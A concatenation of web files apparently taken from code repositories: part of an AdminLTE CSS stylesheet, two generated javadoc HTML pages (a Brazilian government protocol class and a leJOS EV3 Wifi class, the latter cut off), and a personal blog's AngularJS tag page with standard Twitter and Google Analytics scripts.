.accent-cyan .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-cyan .custom-file-input:focus ~ .custom-file-label {
border-color: #63d9ec;
}
.accent-cyan .page-item.active .page-link {
background-color: #17a2b8;
border-color: #17a2b8;
}
.accent-cyan .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-cyan [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-cyan [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-cyan [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-cyan [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-white .btn-link,
.accent-white a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #ffffff;
}
.accent-white .btn-link:hover,
.accent-white a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #d9d9d9;
}
.accent-white .dropdown-item:active, .accent-white .dropdown-item.active {
background: #ffffff;
color: #1F2D3D;
}
.accent-white .custom-control-input:checked ~ .custom-control-label::before {
background: #ffffff;
border-color: #cccccc;
}
.accent-white .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%231F2D3D' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-white .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-white .custom-select:focus,
.accent-white .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-white .custom-file-input:focus ~ .custom-file-label {
border-color: white;
}
.accent-white .page-item.active .page-link {
background-color: #ffffff;
border-color: #ffffff;
}
.accent-white .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-white [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-white [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-white [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-white [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-gray .btn-link,
.accent-gray a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #6c757d;
}
.accent-gray .btn-link:hover,
.accent-gray a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #494f54;
}
.accent-gray .dropdown-item:active, .accent-gray .dropdown-item.active {
background: #6c757d;
color: #ffffff;
}
.accent-gray .custom-control-input:checked ~ .custom-control-label::before {
background: #6c757d;
border-color: #3d4246;
}
.accent-gray .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-gray .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-gray .custom-select:focus,
.accent-gray .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-gray .custom-file-input:focus ~ .custom-file-label {
border-color: #afb5ba;
}
.accent-gray .page-item.active .page-link {
background-color: #6c757d;
border-color: #6c757d;
}
.accent-gray .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-gray [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-gray [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-gray [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-gray [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-gray-dark .btn-link,
.accent-gray-dark a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-gray-dark .btn-link:hover,
.accent-gray-dark a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #121416;
}
.accent-gray-dark .dropdown-item:active, .accent-gray-dark .dropdown-item.active {
background: #343a40;
color: #ffffff;
}
.accent-gray-dark .custom-control-input:checked ~ .custom-control-label::before {
background: #343a40;
border-color: #060708;
}
.accent-gray-dark .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-gray-dark .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-gray-dark .custom-select:focus,
.accent-gray-dark .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-gray-dark .custom-file-input:focus ~ .custom-file-label {
border-color: #6d7a86;
}
.accent-gray-dark .page-item.active .page-link {
background-color: #343a40;
border-color: #343a40;
}
.accent-gray-dark .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-gray-dark [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-gray-dark [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-gray-dark [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-gray-dark [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
[class*="accent-"] a.btn-primary {
color: #ffffff;
}
[class*="accent-"] a.btn-secondary {
color: #ffffff;
}
[class*="accent-"] a.btn-success {
color: #ffffff;
}
[class*="accent-"] a.btn-info {
color: #ffffff;
}
[class*="accent-"] a.btn-warning {
color: #1F2D3D;
}
[class*="accent-"] a.btn-danger {
color: #ffffff;
}
[class*="accent-"] a.btn-light {
color: #1F2D3D;
}
[class*="accent-"] a.btn-dark {
color: #ffffff;
}
/*# sourceMappingURL=adminlte.css.map */ |
javadoc/WSI/br/gov/se/seplag/protocoloatendimento/ResultadoAtualizarProtocoloAtendimento.html | samaanfilho/sedurb | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="pt">
<head>
<!-- Generated by javadoc (version 1.7.0_55) on Tue Jul 29 15:19:04 BRT 2014 -->
<meta http-equiv="Content-Type" content="text/html" charset="windows-1252">
<title>ResultadoAtualizarProtocoloAtendimento</title>
<meta name="date" content="2014-07-29">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="ResultadoAtualizarProtocoloAtendimento";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../br/gov/se/seplag/protocoloatendimento/ProtocoloAtendimento_Service.html" title="class in br.gov.se.seplag.protocoloatendimento"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../../br/gov/se/seplag/protocoloatendimento/ResultadoConsultarProtocoloAtendimento.html" title="class in br.gov.se.seplag.protocoloatendimento"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?br/gov/se/seplag/protocoloatendimento/ResultadoAtualizarProtocoloAtendimento.html" target="_top">Frames</a></li>
<li><a href="ResultadoAtualizarProtocoloAtendimento.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">br.gov.se.seplag.protocoloatendimento</div>
<h2 title="Class ResultadoAtualizarProtocoloAtendimento" class="title">Class ResultadoAtualizarProtocoloAtendimento</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>br.gov.se.seplag.protocoloatendimento.ResultadoAtualizarProtocoloAtendimento</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>public class <span class="strong">ResultadoAtualizarProtocoloAtendimento</span>
extends java.lang.Object</pre>
<div class="block"><p>Java class for anonymous complex type.
<p>The following schema fragment specifies the expected content contained within this class.
<pre>
<complexType>
<complexContent>
<restriction base="{http://www.w3.org/2001/XMLSchema}anyType">
<sequence>
<element name="status" type="{http://www.w3.org/2001/XMLSchema}string"/>
</sequence>
</restriction>
</complexContent>
</complexType>
</pre></div>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- =========== FIELD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_summary">
<!-- -->
</a>
<h3>Field Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation">
<caption><span>Fields</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Field and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>protected java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../../../br/gov/se/seplag/protocoloatendimento/ResultadoAtualizarProtocoloAtendimento.html#status">status</a></strong></code> </td>
</tr>
</table>
</li>
</ul>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><strong><a href="../../../../../br/gov/se/seplag/protocoloatendimento/ResultadoAtualizarProtocoloAtendimento.html#ResultadoAtualizarProtocoloAtendimento()">ResultadoAtualizarProtocoloAtendimento</a></strong>()</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span>Methods</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../../../br/gov/se/seplag/protocoloatendimento/ResultadoAtualizarProtocoloAtendimento.html#getStatus()">getStatus</a></strong>()</code>
<div class="block">Gets the value of the status property.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><strong><a href="../../../../../br/gov/se/seplag/protocoloatendimento/ResultadoAtualizarProtocoloAtendimento.html#setStatus(java.lang.String)">setStatus</a></strong>(java.lang.String value)</code>
<div class="block">Sets the value of the status property.</div>
</td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ============ FIELD DETAIL =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_detail">
<!-- -->
</a>
<h3>Field Detail</h3>
<a name="status">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>status</h4>
<pre>protected java.lang.String status</pre>
</li>
</ul>
</li>
</ul>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="ResultadoAtualizarProtocoloAtendimento()">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>ResultadoAtualizarProtocoloAtendimento</h4>
<pre>public ResultadoAtualizarProtocoloAtendimento()</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method_detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="getStatus()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>getStatus</h4>
<pre>public java.lang.String getStatus()</pre>
<div class="block">Gets the value of the status property.</div>
<dl><dt><span class="strong">Returns:</span></dt><dd>possible object is
<code>String</code></dd></dl>
</li>
</ul>
<a name="setStatus(java.lang.String)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>setStatus</h4>
<pre>public void setStatus(java.lang.String value)</pre>
<div class="block">Sets the value of the status property.</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>value</code> - allowed object is
<code>String</code></dd></dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../br/gov/se/seplag/protocoloatendimento/ProtocoloAtendimento_Service.html" title="class in br.gov.se.seplag.protocoloatendimento"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../../br/gov/se/seplag/protocoloatendimento/ResultadoConsultarProtocoloAtendimento.html" title="class in br.gov.se.seplag.protocoloatendimento"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?br/gov/se/seplag/protocoloatendimento/ResultadoAtualizarProtocoloAtendimento.html" target="_top">Frames</a></li>
<li><a href="ResultadoAtualizarProtocoloAtendimento.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
tag/angularjs.html | Parbhat/portfolio | <!doctype html>
<html lang="en" itemscope itemtype="http://schema.org/Person">
<head>
<meta charset="utf-8">
<!-- Site Meta Data -->
<title>Parbhat Puri - angularjs</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Software Developer and Founder">
<meta name="author" content="Parbhat Puri">
<link rel="shortcut icon" href="https://parbhatpuri.com/images/favicon.ico">
<!-- schema.org -->
<meta itemprop="name" content="Parbhat Puri">
<meta itemprop="image" content="">
<meta itemprop="description" content="Software Developer and Founder">
<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,600,700' rel='stylesheet' type='text/css'>
<!-- Style Meta Data -->
<link rel="stylesheet" href="https://parbhatpuri.com/theme/css/style.css" type="text/css"/>
<link rel="stylesheet" href="https://parbhatpuri.com/theme/css/pygments.css" type="text/css"/>
<!-- Feed Meta Data -->
<link href="https://parbhatpuri.com/feeds/all.atom.xml" type="application/atom+xml" rel="alternate"
title="Parbhat Puri ATOM Feed"/>
<!-- Twitter Feed -->
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:site" content="@parbhatpuri">
<meta name="twitter:creator" content="parbhatpuri">
<meta name="twitter:url" content="https://parbhatpuri.com">
<meta name="twitter:title" content="Parbhat Puri">
<meta name="twitter:description" content="Software Developer and Founder">
<!-- Facebook Meta Data -->
<meta property="og:title" content="Parbhat Puri"/>
<meta property="og:description" content="Software Developer and Founder"/>
<meta property="og:image" content=""/>
<meta name="twitter:creator" content="parbhatpuri">
<meta name="twitter:url" content="https://parbhatpuri.com/tag/angularjs.html">
<meta name="twitter:title" content="Parbhat Puri ~ angularjs">
<meta name="twitter:description" content="Articles de angularjs">
<!-- Facebook Meta Data -->
<meta property="og:title" content="Parbhat Puri ~ angularjs"/>
<meta property="og:description" content="Articles de angularjs"/>
<meta property="og:image" content=""/>
</head>
<body>
<!-- Sidebar -->
<aside>
<!--<center><a href="https://parbhatpuri.com"><img id="avatar" src=""></a></center>-->
<h1>Parbhat Puri</h1>
<p>Software Developer and Founder</p>
<br>
<a class="twitter-follow-button"
href="https://twitter.com/parbhatpuri"
data-show-count="false"
data-lang="en">
Follow @twitterdev
</a>
<script type="text/javascript">
window.twttr = (function (d, s, id) {
var t, js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s);
js.id = id;
js.src = "https://platform.twitter.com/widgets.js";
fjs.parentNode.insertBefore(js, fjs);
return window.twttr || (t = {
_e: [], ready: function (f) {
t._e.push(f)
}
});
}(document, "script", "twitter-wjs"));
</script>
<nav class="nav">
<ul class="list-bare">
<li><a class="nav__link" href="https://parbhatpuri.com">Blog</a></li>
<li><a class="nav__link" href="https://parbhatpuri.com/pages/about.html">About</a></li>
<li><a class="nav__link" href="https://parbhatpuri.com/parbhat_resume.pdf">Resume</a></li>
</ul>
</nav>
<p class="social">
<a href="https://www.linkedin.com/in/parbhat" target="_blank"><img
src="https://parbhatpuri.com/theme/images/icons/linkedin.png"></a>
<a href="https://github.com/parbhat" target="_blank"><img
src="https://parbhatpuri.com/theme/images/icons/github.png"></a>
<a href="https://twitter.com/parbhatpuri" target="_blank"><img
src="https://parbhatpuri.com/theme/images/icons/twitter.png"></a>
<a href="https://parbhatpuri.com/feeds/all.atom.xml" rel="alternate">
<img src="https://parbhatpuri.com/theme/images/icons/rss.png"></a>
</p>
</aside>
<!-- Content -->
<article>
<h1 class="title">Hi, I'm Parbhat Puri</h1>
<ol class="posts">
<h2 class="latest">Latest Posts</h2>
<li class="post_list"><p class="post_entry">
<h2 class="post_title"><a href="https://parbhatpuri.com/what-is-an-api.html" rel="bookmark"
title="Permalink to What is an API?">What is an API?</a>
</h2>
<a href="https://parbhatpuri.com/author/parbhat-puri.html">@Parbhat Puri</a>
<span> in </span>
<span class="post_category"><a href="https://parbhatpuri.com/category/api.html" rel="bookmark"
title="Permalink to api">[ api ]</a></span>
<span class="post_date">Sat 14 March 2015</span>
</li>
<li class="post_list"><p class="post_entry">
<h2 class="post_title"><a href="https://parbhatpuri.com/angularjs-superhero-of-single-page-application.html" rel="bookmark"
title="Permalink to AngularJS Superhero of Single-Page Application (SPA)">AngularJS Superhero of Single-Page Application (SPA)</a>
</h2>
<a href="https://parbhatpuri.com/author/parbhat-puri.html">@Parbhat Puri</a>
<span> in </span>
<span class="post_category"><a href="https://parbhatpuri.com/category/javascript.html" rel="bookmark"
title="Permalink to Javascript">[ Javascript ]</a></span>
<span class="post_date">Fri 30 January 2015</span>
</li>
</ol>
</article>
<!-- Footer -->
<footer>
<p>
Blog powered by <a href="http://getpelican.com/">Pelican</a>,
which takes great advantage of <a href="http://python.org">Python</a>.
Theme <a href="https://github.com/parbhat/pelican-blue">Pelican-Blue</a> by <a
href="https://parbhatpuri.com/">@parbhat</a>.
</p>
</footer>
<!-- Analytics -->
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-50405008-1']);
_gaq.push(['_trackPageview']);
(function () {
var ga = document.createElement('script');
ga.type = 'text/javascript';
ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(ga, s);
})();
</script>
</body>
</html> |
lib/leJOS_EV3_0.8.1-beta/docs/ev3/lejos/hardware/Wifi.html | zmint/galileo | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_37) on Fri Apr 18 13:26:08 BST 2014 -->
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>
Wifi (leJOS EV3 API documentation)
</TITLE>
<META NAME="date" CONTENT="2014-04-18">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Wifi (leJOS EV3 API documentation)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../lejos/hardware/Sounds.html" title="interface in lejos.hardware"><B>PREV CLASS</B></A>
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../index.html?lejos/hardware/Wifi.html" target="_top"><B>FRAMES</B></A>
<A HREF="Wifi.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
lejos.hardware</FONT>
<BR>
Class Wifi</H2>
<PRE>
java.lang.Object
<IMG SRC="../../resources/inherit.gif" ALT="extended by "><B>lejos.hardware.Wifi</B>
</PRE>
<HR>
<DL>
<DT><PRE>public class <B>Wifi</B><DT>extends java.lang.Object</DL>
</PRE>
<P>
<HR>
<P>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<A NAME="constructor_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Constructor Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><B><A HREF="../../lejos/hardware/Wifi.html#Wifi()">Wifi</A></B>()</CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static java.lang.String[]</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../lejos/hardware/Wifi.html#getIfNames()">getIfNames</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../lejos/hardware/LocalWifiDevice.html" title="class in lejos.hardware">LocalWifiDevice</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../lejos/hardware/Wifi.html#getLocalDevice(java.lang.String)">getLocalDevice</A></B>(java.lang.String ifName)</CODE>
<BR>
</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
